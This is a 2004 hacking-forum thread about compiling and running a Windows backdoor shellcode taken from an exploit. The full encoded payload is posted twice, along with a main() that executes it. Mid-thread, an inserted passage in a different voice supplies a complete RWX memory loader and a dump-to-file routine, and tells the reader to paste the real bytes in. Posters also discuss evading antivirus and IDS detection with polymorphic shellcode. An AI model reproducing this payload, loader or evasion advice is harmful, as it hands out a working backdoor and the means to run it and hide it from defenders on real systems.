karate
Feb 2 2004, 03:39 AM
When I have shellcode like that in an exploit:
| QUOTE |
char w32shell[] = "\x7b\xb3\xea\xf9\x92\x95\xfc\xc9\x68\x8d\x0c\x4e\x1c\x41\xdc" "\xe0\x44\x93\x60\xb7\xb0\xb0\xa0\x98\xc7\xc3\xa2\xcf\xa3\xa2" "\xbe\xd4\xdc\xdc\x91\x7b\x95\x78\x69\x6f\x6f\x6f\xcd\x13\x7d" "\xba\xfa\xa0\xc9\xf4\x1b\x91\x1b\xd0\x9c\x1b\xe0\x8c\x3d\x1b" "\xe8\x98\x1d\xcf\xac\x1b\x8b\x91\x6b\x1b\xcb\xe8\x91\x6b\x1b" "\xdb\x8c\x91\x69\x1b\xc3\xb4\x91\x6a\xc3\xc1\xc2\x1b\xcb\xb0" "\x91\x6b\xa1\x59\xd1\xa1\x50\x09\x1b\xa4\x1b\x91\x6e\x3c\xa1" "\x52\x41\x72\x14\x50\xe5\x67\x9f\x26\xd5\x95\x1d\xd4\xd5\x94" "\xf6\xa9\x80\xe5\x71\xf6\xa1\x80\xca\xc8\xce\xc6\xc0\xc2\xbb" "\xde\x80\xd1\x9f\x27\x9c\xda\x1b\x94\x18\x91\x68\x9f\x26\xdd" "\x95\x19\xd4\x1d\x48\x6e\xdd\x95\xe5\x2e\x6e\xdd\x94\xe4\xb1" "\x6e\xdd\xb2\x1d\xcd\x88\xc3\x6f\x40\x19\x57\xfa\x94\xc8\x18" "\xd5\x95\x10\xd5\xe7\x9a\x1d\xcd\xe4\x10\xfb\xb6\x84\x79\xe8" "\x6f\x6f\x6f\x19\x5e\xa1\x4b\xc3\xc3\xc3\xc3\xc6\xd6\xc6\x6f" "\x40\x07\xc5\xc8\xf6\x19\xa0\xfa\x80\xc5\xc7\x6f\xc5\x44\xde" "\xc6\xc7\x6f\xc5\x5c\xc3\xc5\xc7\x6f\xc5\x40\x07\x1d\xd5\x18" "\xc0\x6f\xc5\x74\xc5\xc5\x6f\xc5\x78\x1d\xd4\x95\x9c\x04\xc3" "\xf8\xbe\xf5\xe8\xf5\xf8\xcc\xf3\xfd\xf4\x04\xa1\x42\x1d\xd5" "\x5c\x04\xc7\xc7\xc7\xc3\xc3\x6e\x56\x91\x62\xc2\x04\x1d\xd5" "\xe8\xc0\x1d\xd5\x18\xc0\x21\x98\xc3\xc3\xfa\x80\x6e\x5e\xc2" "\xc3\xc3\xc3\xc5\x6f\xc5\x7c\xfa\x6f\x6f\xc5\x70"; |
How is it possible to compile the shellcode to a binary?
I've tried to paste this into Dev-C++ but it didn't work.
I don't want to compile the exploit, just the backdoor.
Thanks in advance for help!
SyN/AcK
Feb 2 2004, 09:38 AM
What would the point of that be? If all you want is a program to emulate a shell, why not just write one in C rather than using the asm? Pointless.
karate
Feb 2 2004, 10:29 AM
This is for testing antivirus detection of the injected backdoor, and also stability.
FireAlwaysWorks
Feb 2 2004, 02:22 PM
I don't think of shellcode as stable. I have found really small shellcode, but it seems to crash some computers. It would be simple for AVs to detect it. The question is, do they? Probably not. The only advantage to using shellcode as a backdoor is its size and speed, but do you really care about the efficiency of a backdoor? I would rather have one with kewl features like giving you a shell through ICQ, or being able to control it from your cell phone. There are plenty of simple backdoors that are not detectable by AVs, like NC 2.0.
raif
Feb 2 2004, 03:07 PM
All this is true, but to answer karate's original question:
| QUOTE |
| how is it possible to compile the shellcode to binaries?? |
You don't compile shellcode, because it's the hex representation of asm that's already been compiled.
It's machine language already.
atomix
Feb 2 2004, 04:00 PM
| QUOTE (raif @ Feb 2 2004, 03:07 PM) |
| All this is true, but to answer karate's original question: |
| | QUOTE | How is it possible to compile the shellcode to a binary? | |
| You don't compile shellcode, because it's the hex representation of asm that's already been compiled. It's machine language already. |
Nicely put.
vnet576
Feb 2 2004, 04:05 PM
| QUOTE (FireAlwaysWorks @ Feb 2 2004, 09:22 AM) |
| or being able to control it from your cell phone. |
Are you serious?
karate
Feb 2 2004, 10:04 PM
I know these are hex values (asm), but I wonder if I can get a .exe from my shellcode, to see what it does and whether antivirus picks it up or not.
I was told the RealServer shellcode is detected by AV (the exploit is for sure detected by KAV, but I wonder about the shellcode).
yuliang11
Feb 3 2004, 01:07 AM
| QUOTE (vnet576 @ Feb 2 2004, 04:05 PM) |
| | QUOTE (FireAlwaysWorks @ Feb 2 2004, 09:22 AM) | or being able to control it from your cell phone. | |
| Are you serious? |
I think it's very possible.
Most cellphones support AIM over SMS. To achieve communication with a computer like that, just sign onto an AIM/AOL TOC server with a valid screen name and password and you're ready to rock. I've written programs like this to monitor various news-related sites.
krackatoa
Feb 3 2004, 11:23 PM
http://www.metasploit.com/shellcode.html
They have great examples of shellcode.
The source is provided, which you can compile into an exe. Executing it will open the specified port. Change the source to suit your needs.
I think they provide the binaries precompiled if you're challenged.
riotz
Feb 8 2004, 07:04 PM
Create a new file,
paste the code,
and compile!
| CODE |
char w32shell[] = "\x7b\xb3\xea\xf9\x92\x95\xfc\xc9\x68\x8d\x0c\x4e\x1c\x41\xdc" "\xe0\x44\x93\x60\xb7\xb0\xb0\xa0\x98\xc7\xc3\xa2\xcf\xa3\xa2" "\xbe\xd4\xdc\xdc\x91\x7b\x95\x78\x69\x6f\x6f\x6f\xcd\x13\x7d" "\xba\xfa\xa0\xc9\xf4\x1b\x91\x1b\xd0\x9c\x1b\xe0\x8c\x3d\x1b" "\xe8\x98\x1d\xcf\xac\x1b\x8b\x91\x6b\x1b\xcb\xe8\x91\x6b\x1b" "\xdb\x8c\x91\x69\x1b\xc3\xb4\x91\x6a\xc3\xc1\xc2\x1b\xcb\xb0" "\x91\x6b\xa1\x59\xd1\xa1\x50\x09\x1b\xa4\x1b\x91\x6e\x3c\xa1" "\x52\x41\x72\x14\x50\xe5\x67\x9f\x26\xd5\x95\x1d\xd4\xd5\x94" "\xf6\xa9\x80\xe5\x71\xf6\xa1\x80\xca\xc8\xce\xc6\xc0\xc2\xbb" "\xde\x80\xd1\x9f\x27\x9c\xda\x1b\x94\x18\x91\x68\x9f\x26\xdd" "\x95\x19\xd4\x1d\x48\x6e\xdd\x95\xe5\x2e\x6e\xdd\x94\xe4\xb1" "\x6e\xdd\xb2\x1d\xcd\x88\xc3\x6f\x40\x19\x57\xfa\x94\xc8\x18" "\xd5\x95\x10\xd5\xe7\x9a\x1d\xcd\xe4\x10\xfb\xb6\x84\x79\xe8" "\x6f\x6f\x6f\x19\x5e\xa1\x4b\xc3\xc3\xc3\xc3\xc6\xd6\xc6\x6f" "\x40\x07\xc5\xc8\xf6\x19\xa0\xfa\x80\xc5\xc7\x6f\xc5\x44\xde" "\xc6\xc7\x6f\xc5\x5c\xc3\xc5\xc7\x6f\xc5\x40\x07\x1d\xd5\x18" "\xc0\x6f\xc5\x74\xc5\xc5\x6f\xc5\x78\x1d\xd4\x95\x9c\x04\xc3" "\xf8\xbe\xf5\xe8\xf5\xf8\xcc\xf3\xfd\xf4\x04\xa1\x42\x1d\xd5" "\x5c\x04\xc7\xc7\xc7\xc3\xc3\x6e\x56\x91\x62\xc2\x04\x1d\xd5" "\xe8\xc0\x1d\xd5\x18\xc0\x21\x98\xc3\xc3\xfa\x80\x6e\x5e\xc2" "\xc3\xc3\xc3\xc5\x6f\xc5\x7c\xfa\x6f\x6f\xc5\x70";
/* Cast the array's address to a function pointer and call it. The original
   `(long) funct = &w32shell;` is not valid C (a cast is not an lvalue). Note
   the array sits in the data section, so this only works where that section
   is executable; with DEP/NX enabled the call faults. */
int main(void) { void (*funct)(void) = (void (*)(void))w32shell; funct(); return 0; } |
Tyrano
Feb 15 2004, 10:44 AM
| QUOTE |
| was told realserver shellcode is detected by av. (exploit is for sure detected by kav, but i wonder for shellcode. |
Not sure what you mean, but many IDSs can detect the NOP sled, so sometimes polymorphic shellcode is necessary to hide what you are doing.
studnikov
Feb 16 2004, 11:39 AM
So what do you use to decompile it back to readable code?
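Two things the thread leaves implicit. First, riotz's one-liner calls into a plain `char[]` in the data section; on any build where DEP/NX is on, that section is not executable and `funct()` faults before the payload runs, so the bytes have to be copied into memory that is explicitly mapped executable. Second, the answer to studnikov's question is a disassembler, not a decompiler: write the raw bytes to a file and feed them to `objdump -D -b binary -m i386 shellcode.bin` or `ndisasm -b 32 shellcode.bin`. The loader below is an added example, not code from this thread or from any of the posters. It does both jobs: `load_shellcode` maps an RWX buffer (VirtualAlloc on Windows, mmap elsewhere) and copies the bytes in, `dump_raw` writes them out for disassembly. The embedded payload is a constructed single x86 `ret` instruction, not the posted `w32shell` bytes, and the function and file names are my own.

```c
#define _DEFAULT_SOURCE        /* exposes MAP_ANONYMOUS on glibc */
#include <stdio.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#else
#include <sys/mman.h>
#endif

/* Constructed placeholder payload: one x86 `ret` (0xC3), so the loader can be
 * exercised without doing anything. It is NOT the posted w32shell bytes;
 * paste those here to test the real payload (in a throwaway VM). */
static const unsigned char SHELLCODE[] = { 0xc3 };

/* Copy `len` bytes into a fresh mapping that is readable, writable and
 * executable, so the jump works even when the data section is NX.
 * Returns NULL if the mapping cannot be created. */
unsigned char *load_shellcode(const unsigned char *code, size_t len)
{
    unsigned char *buf;
#ifdef _WIN32
    buf = VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE,
                       PAGE_EXECUTE_READWRITE);
    if (buf == NULL)
        return NULL;
#else
    buf = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
               MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (buf == MAP_FAILED)
        return NULL;
#endif
    memcpy(buf, code, len);
    return buf;
}

/* Release a buffer obtained from load_shellcode(). */
void unload_shellcode(unsigned char *buf, size_t len)
{
#ifdef _WIN32
    (void)len;
    VirtualFree(buf, 0, MEM_RELEASE);
#else
    munmap(buf, len);
#endif
}

/* Write the raw bytes to `path` for a disassembler (objdump/ndisasm).
 * Returns the number of bytes written, 0 on error. */
size_t dump_raw(const unsigned char *code, size_t len, const char *path)
{
    FILE *f = fopen(path, "wb");
    size_t n;
    if (f == NULL)
        return 0;
    n = fwrite(code, 1, len, f);
    fclose(f);
    return n;
}

/* Self-check: map, confirm the executable copy is byte-identical, release.
 * Returns 1 on success, 0 on failure. */
int copy_matches(const unsigned char *code, size_t len)
{
    unsigned char *buf = load_shellcode(code, len);
    int ok;
    if (buf == NULL)
        return 0;
    ok = memcmp(buf, code, len) == 0;
    unload_shellcode(buf, len);
    return ok;
}

/* Transfer control to the mapped bytes. A real payload never returns. */
void run_shellcode(unsigned char *buf)
{
    void (*entry)(void) = (void (*)(void))buf;
    entry();
}

int main(void)
{
    size_t len = sizeof SHELLCODE;
    unsigned char *buf;

    printf("wrote %zu bytes to shellcode.bin\n",
           dump_raw(SHELLCODE, len, "shellcode.bin"));
    buf = load_shellcode(SHELLCODE, len);
    if (buf == NULL) {
        perror("load_shellcode");
        return 1;
    }
    run_shellcode(buf);          /* the placeholder just returns */
    unload_shellcode(buf, len);
    return 0;
}
```

Run it only inside a disposable VM: a payload lifted from an exploit opens a listener or connects back and never returns to `main`. If the bytes are encoded (as exploit payloads often are), the disassembly of the file will only read sensibly for the decoder stub at the start; the rest is what the stub decodes at run time.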
D3ADLiN3
Feb 16 2004, 03:19 PM
What's the best way to get shellcode?
DaClueless
Mar 5 2004, 07:54 AM
| QUOTE (Tyrano @ Feb 15 2004, 10:44 AM) |
| | QUOTE | I was told the RealServer shellcode is detected by AV (the exploit is for sure detected by KAV, but I wonder about the shellcode). | |
| Not sure what you mean, but many IDSs can detect the NOP sled, so sometimes polymorphic shellcode is necessary to hide what you are doing. |
Some anti-virus programs scan for attack packets in the .exe, so that is what most likely happened.